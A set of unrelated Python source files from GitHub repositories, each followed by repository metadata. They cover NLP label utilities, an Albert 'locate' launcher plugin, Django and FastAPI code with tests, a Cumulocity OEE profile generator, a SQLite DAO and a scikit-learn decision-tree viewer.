        return {'n_jobs': obj.n_jobs,
                'transformer_list': obj.transformer_list,
                'transformer_weights': obj.transformer_weights}
    elif isinstance(obj, Pipeline):
        return {'steps': pretty_pipeline(obj.steps)}
    elif isinstance(obj, tuple):
        # tuples (e.g. (name, step)) are flattened like lists
        return pretty_pipeline(list(obj))
    else:
        # leaf value (estimator, string, number, ...): returned as-is
        return obj
def strings_to_integers(strings, labels):
    """Convert an array of strings to an array of integers.

    The same string always maps to the same integer: its index of first
    occurrence in ``labels``.

    Args:
        strings: An iterable of strings to convert.
        labels: The reference list of label strings.

    Returns:
        A list of integers (indexes into ``labels``).

    Raises:
        ValueError: If a string is not present in ``labels``.
    """
    return [labels.index(string) for string in strings]
def integers_to_strings(integers, labels):
    """Map each integer in ``integers`` to the string at that index in
    ``labels``.

    Args:
        integers: An iterable of indexes into ``labels``.
        labels: The reference list of label strings.

    Returns:
        A list of strings, one per input integer.
    """
    return [labels[index] for index in integers]
def merge_classes(lst, classes, new_class):
    """Merge classes from lst into one new_class, in place.

    Args:
        lst: A list of class names (strings) to rewrite.
        classes: The class names to replace.
        new_class: The replacement class name.

    Returns:
        The same list, with every occurrence of ``classes`` replaced by
        ``new_class``.
    """
    for idx, value in enumerate(lst):
        if value in classes:
            lst[idx] = new_class
    return lst
def eval_with_semeval_script(test, predicted):
    """Eval prediction on test with the SemEval scorer script (T4SA).

    Writes "<sid>\t<label>" lines to a temp file, runs the perl scorer on
    it, and returns the scorer's stdout/stderr plus the contents of the
    generated ``<tmp>.scored`` file.

    Args:
        test: Dataset object; must expose ``labels`` (label strings) and
            ``sid`` (sentence ids), parallel to ``predicted``.
        predicted: Predicted label indexes (integers into ``test.labels``).

    Returns:
        The combined scorer output as a single string.

    Raises:
        IOError: An error occurred.
    """
    predicted = integers_to_strings(predicted, test.labels)
    # delete=False: the perl scorer must be able to open the file by name
    ofile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
    ret = None
    try:
        for (sid, pred) in zip(test.sid, predicted):
            ofile.write('%s\t%s\n' % (sid, pred))
        ofile.close()
        p = Popen(['_scripts/SemEval2016_task4_test_scorer_subtaskA.pl',
                   ofile.name], stdout=PIPE, stderr=PIPE, cwd=SEMEVAL_SCORER_PATH)
        out, err = p.communicate()
        ret = out + err
        ret = ret.decode()
        # the scorer writes its report next to the input file
        with open(ofile.name + '.scored', 'r') as ifile:
            for line in ifile:
                ret += line
    finally:
        # clean up both the input file and the scorer's output
        if not ofile.closed:
            ofile.close()
        os.remove(ofile.name)
        os.remove(ofile.name + '.scored')
    return ret
def assoc_value(lst, value):
    """Return the entry whose first element equals ``value``, and its index.

    Args:
        lst: An associative list of (key, ...) entries.
        value: The key to match on.

    Returns:
        A ``(entry, index)`` pair for the first match, or None (implicitly)
        when no entry matches.
    """
    return next(((entry, idx) for idx, entry in enumerate(lst)
                 if entry[0] == value), None)
def invert_dict_nonunique(d):
    """Invert ``d``, grouping together keys that share the same value.

    Returns a dict mapping each value of ``d`` to the list of keys that
    held it (in iteration order).
    """
    inverted = {}
    for key, value in d.items():
        inverted.setdefault(value, []).append(key)
    return inverted
def split_train_valid(input_path, valid_num=3000):
    """Split a file in two (.valid and .train) with valid_num lines in
    .valid and everything else in .train.

    Args:
        input_path: Path of the UTF-8 file to split.
        valid_num: Number of lines for the .valid file. A value in
            [0, 1] is interpreted as a fraction of the total line count.

    Lines are picked uniformly at random (unseeded, so not reproducible).
    """
    train_path = input_path + '.train'
    valid_path = input_path + '.valid'
    with codecs.open(input_path, 'r', 'utf-8') as ifile:
        nb_line = sum(1 for _ in ifile)
    if 0 <= valid_num <= 1:
        valid_num = math.floor(nb_line * valid_num)
    # set instead of list: O(1) membership test per line, and no
    # exception-driven control flow in the copy loop
    valid_indexes = set(random.sample(range(nb_line), valid_num))
    # `with` guarantees all three handles close even if an open/write fails
    # (the previous try/finally could hit unbound names on a failed open)
    with codecs.open(input_path, 'r', 'utf-8') as ifile, \
         codecs.open(train_path, 'w+', 'utf-8') as train_file, \
         codecs.open(valid_path, 'w+', 'utf-8') as valid_file:
        for idx, line in enumerate(ifile):
            if idx in valid_indexes:
                valid_file.write(line)
            else:
                train_file.write(line)
def opinion_lexicon_to_graph(lexicon):
    """Return an undirected similarity graph from an opinion lexicon.

    ``lexicon`` maps each word to its class. Two words are connected when
    they belong to the same class, so the result maps every word of the
    lexicon to the (shared) list of all words of its class.

    Intended to be used by emb.build_custom3.
    """
    # Group the words by class (inlined inversion of the lexicon).
    by_class = {}
    for word, cls in lexicon.items():
        by_class.setdefault(cls, []).append(word)
    # Every word of a class points at the same member list (shared object).
    graph = {}
    for members in by_class.values():
        for word in members:
            graph[word] = members
    return graph
def split_lexicon_train_test(lexicon, ratio=0.9, shuffle=False):
    """Split each class of the lexicon into a train part and a test part.

    Args:
        lexicon: A word -> class mapping to split.
        ratio: Fraction of each class that goes to the train lexicon
            (0.9 means 90%).
        shuffle: When True, shuffle each class's words before splitting.

    Returns:
        A (train_lexicon, test_lexicon) pair of word -> class mappings.
    """
    train_lexicon = {}
    test_lexicon = {}
    # Group words by class (inlined inversion of the lexicon).
    by_class = {}
    for word, cls in lexicon.items():
        by_class.setdefault(cls, []).append(word)
    for cls, words in by_class.items():
        if shuffle:
            random.shuffle(words)
        cut = math.floor(len(words) * ratio)
        for w in words[:cut]:
            train_lexicon[w] = cls
        for w in words[cut:]:
            test_lexicon[w] = cls
    return train_lexicon, test_lexicon
def remove_multi_words_in_lexicon(lexicon):
    """Return a copy of ``lexicon`` without multi-word entries.

    An entry is multi-word when its key contains a space character
    (equivalent to the previous ``len(w.split(' ')) == 1`` test).
    """
    return {word: cls for word, cls in lexicon.items() if ' ' not in word}
| daimrod/opinion-sentence-annotator | utils.py | utils.py | py | 7,027 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "sklearn.pipeline.FeatureUnion",
"line_number": 36,
"usage_type": "argument"
},
{
"api_name": "sklearn.pipeline.Pipeline",
"line_number": 40,
"usage_type": "argument"
},
{
... |
5986988615 | from albert import *
import os
import pathlib
import shlex
import subprocess
# Albert plugin metadata, read by the albert plugin loader.
md_iid = '1.0'
md_version = "1.8"
md_name = "Locate"
md_description = "Find and open files using locate"
md_license = "BSD-3"
md_url = "https://github.com/albertlauncher/python/tree/master/locate"
md_bin_dependencies = "locate"
class Plugin(TriggerQueryHandler):
    """Albert trigger-query handler that searches the filesystem with the
    ``locate`` command-line tool and offers to open the matching files."""

    def id(self):
        # NOTE(review): md_id is not defined in this module -- presumably
        # injected into the plugin namespace by albert; verify.
        return md_id

    def name(self):
        return md_name

    def description(self):
        return md_description

    def defaultTrigger(self):
        # Single quote triggers this handler.
        return "'"

    def synopsis(self):
        return "<locate params>"

    def initialize(self):
        # Icon candidates; the bundled SVG is the final fallback.
        self.icons = [
            "xdg:preferences-system-search",
            "xdg:system-search",
            "xdg:search",
            "xdg:text-x-generic",
            str(pathlib.Path(__file__).parent / "locate.svg")
        ]

    def handleTriggerQuery(self, query):
        """Run ``locate`` for queries of 3+ chars; otherwise offer updatedb."""
        if len(query.string) > 2:
            try:
                # shell-style splitting so users can pass locate flags/quotes
                args = shlex.split(query.string)
            except ValueError:
                # unbalanced quotes etc. -- wait for more input
                return
            result = subprocess.run(['locate', *args], stdout=subprocess.PIPE, text=True)
            # bail out early if the query was cancelled while locate ran
            if not query.isValid:
                return
            lines = sorted(result.stdout.splitlines(), reverse=True)
            if not query.isValid:
                return
            for path in lines:
                basename = os.path.basename(path)
                query.add(
                    Item(
                        id=path,
                        text=basename,
                        subtext=path,
                        icon=self.icons,
                        actions=[
                            # bind path as a default arg to avoid late binding
                            Action("open", "Open", lambda p=path: openUrl("file://%s" % p))
                        ]
                    )
                )
        else:
            query.add(
                Item(
                    id="updatedb",
                    text="Update locate database",
                    subtext="Type at least three chars for a search",
                    icon=self.icons,
                    actions=[
                        Action("update", "Update", lambda: runTerminal("sudo updatedb"))
                    ]
                )
            )
| m0lw9re/albert | plugins/python/plugins/locate/__init__.py | __init__.py | py | 2,227 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "shlex.split",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "subprocess.run",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "subprocess.PIPE",
"line_n... |
30942866367 | from rest_framework import serializers
from .models import Product, Ingredient
class IngredientSerializer(serializers.ModelSerializer):
    """DRF serializer exposing an Ingredient's title and price."""
    class Meta:
        model = Ingredient
        fields = ('title', 'price')
class ProductSerializer(serializers.ModelSerializer):
    """DRF serializer for a Product, with its ingredients nested read-only."""
    # read_only: ingredients cannot be created/updated through this serializer
    ingredients = IngredientSerializer(read_only=True, many=True)

    class Meta:
        model = Product
        fields = ('id', 'product_type', 'title',
                  'image', 'description', 'price', 'ingredients')
| Dawid-Dahl/stereo-nightclub-api | api/serializers.py | serializers.py | py | 495 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "rest_framework.serializers.ModelSerializer",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.serializers",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "models.Ingredient",
"line_number": 7,
"usage_type": "name"
},
... |
71713005863 | import requests
class ApiBaseActions:
    """Thin wrapper around a requests.Session bound to a base URL."""

    def __init__(self, base_url):
        """Store ``base_url`` with a guaranteed trailing slash and open a
        persistent HTTP session."""
        if base_url.endswith("/"):
            self.base_url = base_url
        else:
            self.base_url = base_url + "/"
        self.session = requests.Session()

    def make_request(self, method: str, route_url: str = None, **kwargs):
        """Issue an HTTP request against ``base_url`` + ``route_url``.

        Args:
            method: "GET" or "POST".
            route_url: Route appended to the base URL; a leading slash is
                stripped. When None, the base URL itself is requested
                (previously this path left the URL variable unbound and
                raised UnboundLocalError).
            **kwargs: Passed through to the session call.

        Returns:
            The requests Response.

        Raises:
            NameError: For unsupported methods (kept for backward
                compatibility with existing callers).
        """
        request_methods = {"GET": self.session.get,
                           "POST": self.session.post
                           }
        request_url = self.base_url
        if route_url is not None:
            if route_url.startswith("/"):
                route_url = route_url[1:]
            request_url = self.base_url + route_url
        handler = request_methods.get(method)
        if handler is None:
            raise NameError("Invalid API method provided")
        print(f" making {method} request to {request_url}")
        response = handler(request_url, **kwargs)
        return response
| HarshDevSingh/python-behave | api/api_base.py | api_base.py | py | 906 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.Session",
"line_number": 10,
"usage_type": "call"
}
] |
import streamlit as st
from transformers import pipeline

# 👈 Add the caching decorator
# NOTE(review): st.cache is deprecated in newer Streamlit releases
# (st.cache_resource is the modern replacement) -- confirm target version.
@st.cache(allow_output_mutation=True)
def load_model():
    """Load (and cache) the default Hugging Face sentiment-analysis pipeline."""
    return pipeline("sentiment-analysis")

model = load_model()
query = st.text_input("Your query")
if query:
    result = model(query)[0]  # 👈 Classify the query text
    st.write(result["label"])
| Jaggusms/sentiment_analysis_higgingFace | app.py | app.py | py | 349 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "transformers.pipeline",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "streamlit.cache",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "streamlit.text_input",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "streamlit.wr... |
10691268780 | import sqlite3 as sql
from sqlite3 import OperationalError
from pythonobjet.exo1_formesgeometriques.point.Point import Point
class PointDao:
    """SQLite persistence for Point objects (table ``pointTable`` in the
    ``donnee.db`` file of the current working directory)."""

    def __init__(self):
        pass

    def initialisation(self):
        """Create the pointTable table; report (but swallow) the error when
        it already exists, matching the previous behaviour."""
        connecteur = sql.connect("donnee.db")
        try:
            curseur = connecteur.cursor()
            requete = "create table pointTable(col1 integer, col2 integer)"
            try:
                curseur.execute(requete)
            except OperationalError as e:
                # typically "table pointTable already exists"
                print("ope=", e)
            connecteur.commit()
        finally:
            # close even when execute/commit raises (previously leaked)
            connecteur.close()

    def insertPoint(self, point):
        """Insert one point; ``point`` must expose getX() and getY().

        Uses a parameterized query instead of string interpolation."""
        connecteur = sql.connect("donnee.db")
        try:
            curseur = connecteur.cursor()
            curseur.execute("insert into pointTable(col1, col2) values (?, ?)",
                            (point.getX(), point.getY()))
            connecteur.commit()
        finally:
            connecteur.close()

    def listePoints(self):
        """Return all stored rows as Point instances."""
        listePoints = []
        connecteur = sql.connect("donnee.db")
        try:
            curseur = connecteur.cursor()
            curseur.execute("select * from pointTable")
            for ligne in curseur.fetchall():
                listePoints.append(Point(ligne[0], ligne[1]))
        finally:
            connecteur.close()
        return listePoints
if __name__ == "__main__":
    # Small demo: create the table, insert two points and list them back.
    print("================ debut point dao ==================")
    # initialisation (creates the table when missing)
    pointDao = PointDao()
    pointDao.initialisation()
    # insert two sample points
    p1 = Point(0,0)
    p2 = Point(1,1)
    pointDao.insertPoint(p1)
    pointDao.insertPoint(p2)
    # list everything back
    listep = pointDao.listePoints()
    print("La liste est ", listep )
| silvaplana/pythontraining | pythonobjet/exo1_formesgeometriques/point/PointDao.py | PointDao.py | py | 1,627 | python | fr | code | 0 | github-code | 36 | [
{
"api_name": "sqlite3.connect",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sqlite3.OperationalError",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "sqlite3.connect",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "sqlite3.conn... |
3314005552 | import time, json, os, logging, requests
from cumulocityAPI import C8Y_BASEURL, C8Y_TENANT, C8Y_HEADERS, CumulocityAPI
from arguments_handler import get_profile_generator_mode
from oeeAPI import OeeAPI
def try_int(value):
    """Return ``int(value)``, or None when the value cannot be converted.

    Only conversion errors are swallowed (the previous bare ``except``
    also caught KeyboardInterrupt/SystemExit).
    """
    try:
        return int(value)
    except (TypeError, ValueError):
        return None
# Tunables read from the environment; any falsy/invalid value (unset, 0,
# non-numeric) falls back to the default because of the ``or``.
PROFILES_PER_DEVICE = try_int(os.environ.get('PROFILES_PER_DEVICE')) or 1
SLEEP_TIME_FOR_PROFILE_CREATION_LOOP = try_int(os.environ.get('SLEEP_TIME_FOR_PROFILE_CREATION_LOOP')) or 60 * 12
MODE = get_profile_generator_mode()
# JSON-PYTHON mapping, to get json.load() working
null = None
false = False
true = True
######################
logging.basicConfig(format='%(asctime)s %(name)s:%(message)s', level=logging.INFO)
log = logging.getLogger("profile-generator")
log.info("using C8Y backend:" + C8Y_BASEURL)
log.info("using C8Y tenant:" + C8Y_TENANT)
c8y_api = CumulocityAPI()
oee_api = OeeAPI()
def delete_profiles():
    """Delete every OEE calculation-profile child device of every simulator.

    Walks each simulator's child devices via the Cumulocity inventory API
    and deletes those whose type matches OEE_CALCULATION_PROFILE_TYPE.
    """
    simulator_ids = oee_api.get_simulator_ids()
    deleted_profiles = 0
    for simulator_id in simulator_ids:
        log.info(f'deleting profiles for {simulator_id}')
        response = requests.get(f'{C8Y_BASEURL}/inventory/managedObjects/{simulator_id}', headers=C8Y_HEADERS)
        if response.ok:
            child_devices = response.json()['childDevices']['references']
            for child_device in child_devices:
                child_device_id = child_device['managedObject']['id']
                child_device_json = c8y_api.get_managed_object(child_device_id)
                # only delete calculation profiles, not other child devices
                if child_device_json['type'] == c8y_api.OEE_CALCULATION_PROFILE_TYPE:
                    log.info(f'deleting managed object {child_device_id}')
                    deleted_profiles = deleted_profiles + c8y_api.delete_managed_object(child_device_id)
        else:
            log.warning(f'Couldn\'t find the managed object. response: {response}, content: {response.text}')
    log.info(f'profiles deleted: {deleted_profiles}')
# Script body: exactly one of the MODE branches below runs per invocation.
if MODE == 'createProfiles':
    # Create PROFILES_PER_DEVICE profiles per simulator, pausing every 200
    # profiles so the calculation load can be observed at each count.
    log.info('===============================')
    log.info('starting to create profiles ...')
    log.info(f'existing profiles: {c8y_api.count_all_profiles()}')
    counter = 0
    for _ in range(PROFILES_PER_DEVICE):
        for external_id in oee_api.get_simulator_external_ids():
            profile = oee_api.create_and_activate_profile(external_id)
            counter = counter + 1
            if counter % 200 == 0:
                log.info(f'profiles: {c8y_api.count_all_profiles()}. Wait for {SLEEP_TIME_FOR_PROFILE_CREATION_LOOP} minutes')
                # sleep for some time to be able to verify if calculation is still working with the given number of profiles
                time.sleep(SLEEP_TIME_FOR_PROFILE_CREATION_LOOP)
    log.info(f'profiles after execution: {c8y_api.count_all_profiles()}')
if MODE == 'removeSimulatorProfilesViaOee':
    # Remove all simulator profiles through the OEE API.
    log.info('===============================================')
    log.info('starting to remove all simulator profiles via OEE API ...')
    log.info(f'existing profiles: {c8y_api.count_all_profiles()}')
    oee_api.delete_all_simulators_profiles()
    log.info(f'profiles after execution: {c8y_api.count_all_profiles()}')
if MODE == 'deleteSimulatorProfiles':
    # Remove all simulator profiles directly via the inventory API.
    log.info('===================================')
    log.info('starting to delete all simulator profiles ...')
    log.info(f'existing profiles: {c8y_api.count_all_profiles()}')
    delete_profiles()
    log.info(f'profiles after execution: {c8y_api.count_all_profiles()}')
if MODE == 'deleteCalculationCategories':
    # Delete every calculation-category managed object.
    log.info('===================================')
    log.info('starting to delete all calculation categories ...')
    log.info(
        f'existing category managed objects: {c8y_api.count_all_categories()}')
    deleted_categories = 0
    for category in c8y_api.get_calculation_categories():
        deleted_categories += c8y_api.delete_managed_object(category['id'])
    log.info(f'Managed_objects deleted: {deleted_categories}')
if MODE == 'createCalculationCategories':
    # Create (or merge into) the single calculation-categories managed object
    # from the local categories.json file.
    log.info('===================================')
    log.info('starting to create calculation categories ...')
    with open('./categories.json', 'r') as f:
        categories = f.read()
    if (c8y_api.count_all_categories()) == 0:
        log.info('Create category managed object')
        c8y_api.create_managed_object(categories)
    elif (c8y_api.count_all_categories()) == 1:
        log.info('Update category managed object')
        categories_by_id = {}
        # merge file categories with the existing ones; on an id clash the
        # existing (server-side) entry wins because it is assigned last
        for c in json.loads(categories)['categories'] + c8y_api.get_calculation_categories()[0]['categories']:
            categories_by_id[c['id']] = c
        mo_id = c8y_api.get_calculation_categories()[0]['id']
        fragment = {
            'categories': list(categories_by_id.values())
        }
        c8y_api.update_managed_object(mo_id, json.dumps(fragment))
    else:
        log.warning('More than 1 category managed object! Unable to update managed object')
    log.info('==========Categories created==========')
| SoftwareAG/oee-simulators | simulators/main/profile_generator.py | profile_generator.py | py | 5,006 | python | en | code | 8 | github-code | 36 | [
{
"api_name": "os.environ.get",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.environ.get",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_... |
70874377705 | from decimal import Decimal
from random import random
from unittest.mock import ANY, Mock
from uuid import UUID, uuid4
from fastapi import FastAPI
from injector import InstanceProvider
from mockito import when
from pytest import fixture, mark
from currency import Currency
from ordering import Service as OrderingService
from ordering import commands, errors
from ordering.queries import BuyOrdersQueries
from tests.ordering.factories import BuyOrderFactory as BuyOrder
from .factories import ApiCreateBuyOrderRequestFactory as CreateBuyOrder
CREATE_ORDER_URL = "/orders/"
class TestCreateBuyOrderRequest:
    """Request-validation behaviour of POST /orders/ (schema level):
    valid payloads are created and redirect to the order; malformed
    payloads are rejected with 422."""

    def test_after_creating_redirects_to_created_order(self, api_client):
        request = CreateBuyOrder()
        response = api_client.post(CREATE_ORDER_URL, json=request)
        assert response.status_code == 201
        # Location header points at the created resource
        order_url = response.headers["Location"]
        order = api_client.get(order_url).json()
        assert order["request_id"] == request["request_id"]

    def test_creating_order_is_idempotent(self, api_client):
        # posting the same request_id twice must yield the same order
        request = CreateBuyOrder()
        first = api_client.post(CREATE_ORDER_URL, json=request)
        second = api_client.post(CREATE_ORDER_URL, json=request)
        assert first.headers["Location"] == second.headers["Location"]

    @mark.parametrize(
        "request_id", ["ILLEGAL", uuid4().hex[:-3], "", random(), None]
    )
    def test_reject_when_no_uuid_id(self, api_client, request_id):
        request = CreateBuyOrder().update(request_id=request_id)
        response = api_client.post(CREATE_ORDER_URL, json=request)
        assert response.status_code == 422

    def test_reject_when_negative_amount(self, api_client):
        request = CreateBuyOrder().update(amount=-1)
        response = api_client.post(CREATE_ORDER_URL, json=request)
        assert response.status_code == 422

    def test_reject_when_amount_higher_than_1_000_000_000(self, api_client):
        # boundary itself is rejected
        request = CreateBuyOrder().update(amount=1_000_000_000)
        response = api_client.post(CREATE_ORDER_URL, json=request)
        assert response.status_code == 422

    @mark.parametrize("currency", ["PLN", "AUD", "XXX"])
    def test_reject_when_currency_not_eur_gbp_usd(self, api_client, currency):
        request = CreateBuyOrder().update(currency=currency)
        response = api_client.post(CREATE_ORDER_URL, json=request)
        assert response.status_code == 422
class TestCreateBuyOrderController:
    """Controller-level behaviour of POST /orders/ with the ordering
    service mocked out (mockito + injector)."""

    def test_201_when_created(
        self, app, api_client, create_buy_order, order_url,
    ):
        response = api_client.post(CREATE_ORDER_URL, json=create_buy_order)
        assert response.status_code == 201
        assert response.headers["Location"] == order_url

    def test_301_when_already_created(
        self, api_client, ordering, order_id, order_url,
    ):
        # service signals a duplicate -> permanent redirect to existing order
        when(ordering).create_buy_order(...).thenRaise(
            errors.OrderAlreadyExists(order_id)
        )
        response = api_client.post(CREATE_ORDER_URL, json=CreateBuyOrder())
        assert response.status_code == 301
        assert response.headers["Location"] == order_url

    def test_409_when_order_limit_exceeded(self, api_client, ordering):
        when(ordering).create_buy_order(...).thenRaise(
            errors.BalanceLimitExceeded(Decimal(100))
        )
        response = api_client.post(CREATE_ORDER_URL, json=CreateBuyOrder())
        assert response.status_code == 409
        assert response.json()["detail"] == "Exceeded 100BTC ordering limit"

    @fixture
    def create_buy_order(self) -> dict:
        return CreateBuyOrder()

    @fixture
    def order_id(self) -> UUID:
        return uuid4()

    @fixture
    def order_url(self, app: FastAPI, order_id: UUID) -> str:
        return app.url_path_for("orders:get_order", order_id=str(order_id))

    @fixture(autouse=True)
    def ordering(
        self, container, create_buy_order, order_id,
    ) -> OrderingService:
        """Bind mocked OrderingService/BuyOrdersQueries into the DI container
        and stub the happy-path create call for ``create_buy_order``."""
        service = Mock(spec=OrderingService)
        container.binder.bind(OrderingService, to=InstanceProvider(service))
        queries = Mock(spec=BuyOrdersQueries)
        container.binder.bind(BuyOrdersQueries, to=InstanceProvider(queries))
        request_id = UUID(hex=create_buy_order["request_id"])
        when(queries).get_order_id(request_id).thenReturn(order_id)
        when(service).create_buy_order(
            commands.CreateBuyOrder.construct(
                id=request_id,
                amount=(
                    Decimal(create_buy_order["amount"])
                    .quantize(Decimal(10) ** -4)
                ),
                currency=Currency[create_buy_order["currency"]],
                timestamp=ANY,
            )
        ).thenReturn(order_id)
        return service
class TestGetBuyOrderController:
    """Controller-level behaviour of GET /orders/{id} with queries mocked."""

    def test_404_when_no_order(self, api_client):
        response = api_client.get(f"/orders/{uuid4()}")
        assert response.status_code == 404

    def test_order_data_when_order_exists(self, api_client, order):
        response = api_client.get(f"/orders/{order.id}")
        assert response.json() == {
            "id": str(order.id),
            "request_id": str(order.request_id),
            "bitcoins": float(order.bitcoins),
            "bought_for": float(order.bought_for),
            "currency": order.currency.name,
        }

    @fixture
    def order(self) -> BuyOrder:
        return BuyOrder()

    @fixture(autouse=True)
    def queries(self, container, order) -> BuyOrdersQueries:
        # default: unknown ids resolve to None; the fixture order resolves
        # to itself
        queries = Mock(BuyOrdersQueries)
        when(queries).get_order(...).thenReturn(None)
        when(queries).get_order(order.id).thenReturn(order)
        container.binder.bind(BuyOrdersQueries, to=InstanceProvider(queries))
        return queries
| lzukowski/workflow | tests/application/test_api.py | test_api.py | py | 5,764 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "factories.ApiCreateBuyOrderRequestFactory",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "factories.ApiCreateBuyOrderRequestFactory",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "factories.ApiCreateBuyOrderRequestFactory",
"line_number"... |
30591789155 | from __future__ import annotations
from grammar import Grammar, reduce_left_recursion, chomsky_normal_form
from dacite import from_dict
import json
def main():
    """Read a grammar from a JSON file, then print it after left-recursion
    elimination and after conversion to Chomsky normal form."""
    filename = input("Input file name:") or "data.json"
    # The previous f-string had no placeholder and always printed "(unknown)".
    print(f"using file {filename}")
    with open(filename, "r") as f:
        data = json.load(f)
    g = from_dict(data_class=Grammar, data=data)
    print("--------- Input grammar -----------")
    g.print()
    print("--------- Left Recursion Elimination -----------")
    g = reduce_left_recursion(g)
    g.print()
    print("--------- Chomsky Normal Form -----------")
    g = chomsky_normal_form(g)
    g.print()
if __name__ == "__main__":
main()
| fairay/Compilers | lab2/main.py | main.py | py | 682 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.load",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "dacite.from_dict",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "grammar.Grammar",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "grammar.reduce_left_recurs... |
9211558964 | import sys
import os
import time
import traceback
import pandas as pd
import seaborn as sns
import pydotplus
import matplotlib.pyplot as plt
import numpy as np
from sklearn.tree import export_graphviz
from sklearn import tree
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GridSearchCV, RandomizedSearchCV
from sklearn import datasets
from sklearn.utils import shuffle
from sklearn.metrics import mean_squared_error
from sklearn.metrics import confusion_matrix, classification_report
sys.path.append('../')
from SOL4Py.ZApplicationView import *
from SOL4Py.ZLabeledComboBox import *
from SOL4Py.ZPushButton import *
from SOL4Py.ZVerticalPane import *
from SOL4Py.ZTabbedWindow import *
from SOL4Py.ZMLModel import *
from SOL4Py.ZScalableScrolledFigureView import *
from SOL4Py.ZScalableScrolledDecisionTreeView import*
# Dataset selector ids consumed by DecisionTreeClassifierModel.load_dataset.
Iris = 0
Digits = 1
Wine = 2
BreastCancer = 3
############################################################
# Classifier Model class
class DecisionTreeClassifierModel(ZMLModel):
    """Decision-tree classification workflow over the sklearn toy datasets:
    load the dataset selected by ``dataset_id``, train (or reload) a
    DecisionTreeClassifier, predict on a held-out split and visualize."""

    ##
    # Constructor
    def __init__(self, dataset_id, mainv):
        # dataset_id: one of Iris/Digits/Wine/BreastCancer; mainv: owning view
        super(DecisionTreeClassifierModel, self).__init__(dataset_id, mainv)

    def run(self):
        """Full pipeline: load data, load or build+train+save the model,
        predict on the test split and visualize the result."""
        self.write("====================================")
        self._start(self.run.__name__)
        try:
            # 1 Load dataset
            self.load_dataset()
            # 2 Load or create model
            if self.trained():
                # 2.1 if trained, load a trained model pkl file
                self.load()
            else:
                # 2.2 else create a model, and train and save it
                self.build()
                self.train()
                self.save()
            # 3 Predict for test_data
            self.predict()
            # 4 Visualize the prediction
            self.visualize()
        except Exception:
            # narrowed from a bare ``except:`` so KeyboardInterrupt and
            # SystemExit are no longer swallowed
            traceback.print_exc()
        self._end(self.run.__name__)

    def load_dataset(self):
        """Load the sklearn dataset selected by ``self.dataset_id`` and
        split it 70/30 into train/test (fixed random_state for
        reproducibility)."""
        self._start(self.load_dataset.__name__)
        # elif chain: the ids are mutually exclusive constants
        if self.dataset_id == Iris:
            self.dataset = datasets.load_iris()
            self.write("loaded iris dataset")
        elif self.dataset_id == Digits:
            self.dataset = datasets.load_digits()
            self.write("loaded Digits dataset")
        elif self.dataset_id == Wine:
            self.dataset = datasets.load_wine()
            self.write("loaded Wine dataset")
        elif self.dataset_id == BreastCancer:
            self.dataset = datasets.load_breast_cancer()
            self.write("loaded BreastCancer dataset")
        attr = dir(self.dataset)
        self.write("dir:" + str(attr))
        if "feature_names" in attr:
            self.write("feature_names:" + str(self.dataset.feature_names))
        if "target_names" in attr:
            self.write("target_names:" + str(self.dataset.target_names))
        self.set_model_filename()
        self.view.description.setText(self.dataset.DESCR)
        X, y = self.dataset.data, self.dataset.target
        self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(
            X, y, test_size=0.3, random_state=42)
        self._end(self.load_dataset.__name__)

    def build(self):
        """Create an untrained DecisionTreeClassifier."""
        self._start(self.build.__name__)
        self.model = tree.DecisionTreeClassifier(random_state=0)
        self._end(self.build.__name__)

    def train(self):
        """Grid-search ``max_depth`` in [3, 20), then refit the best model
        on the full training split."""
        self._start(self.train.__name__)
        start = time.time()
        params = {'max_depth': range(3, 20)}
        grid_search = GridSearchCV(self.model, param_grid=params, n_jobs=4)
        grid_search.fit(self.X_train, self.y_train)
        self.write("GridSearch BestParams " + str(grid_search.best_params_))
        self.write("GridSearch BestScore " + str(grid_search.best_score_))
        # NOTE(review): the refit omits random_state (build() used 0), so
        # repeated trainings may differ slightly -- confirm intended.
        self.model = tree.DecisionTreeClassifier(**grid_search.best_params_)
        # Call fit method of the classifier
        self.model.fit(self.X_train, self.y_train)
        elapsed_time = time.time() - start
        elapsed = str("Train elapsed_time:{0}".format(elapsed_time) + "[sec]")
        self.write(elapsed)
        self._end(self.train.__name__)

    def predict(self):
        """Predict on the test split and log a classification report."""
        self._start(self.predict.__name__)
        self.pred_test = self.model.predict(self.X_test)
        report = str(classification_report(self.y_test, self.pred_test))
        self.write(report)
        self._end(self.predict.__name__)

    def visualize(self):
        """Show the confusion matrix and the fitted tree in the view."""
        cmatrix = confusion_matrix(self.y_test, self.pred_test)
        self.view.visualize(cmatrix, self.model)
############################################################
# Classifier View
class MainView(ZApplicationView):
    """Main window: dataset picker in the top dock, a log text editor on
    the left, and a tabbed pane (description / confusion matrix /
    decision tree) on the right."""
    # Class variables
    # ClassifierView Constructor
    def __init__(self, title, x, y, width, height):
        super(MainView, self).__init__(title, x, y, width, height)
        self.font = QFont("Arial", 10)
        self.setFont(self.font)
